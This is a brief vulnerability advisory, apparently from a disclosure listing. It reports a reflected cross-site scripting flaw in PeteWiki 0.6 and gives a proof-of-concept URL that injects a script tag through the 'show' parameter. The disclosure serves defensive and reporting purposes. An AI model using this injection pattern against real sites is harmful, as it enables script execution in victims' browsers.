Search
Software Vulnerability Tested On Date
PeteWiki 0.6 Reflected Cross-site Scripting Windows Vista + XAMPP 7/5/2010
Description
A vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E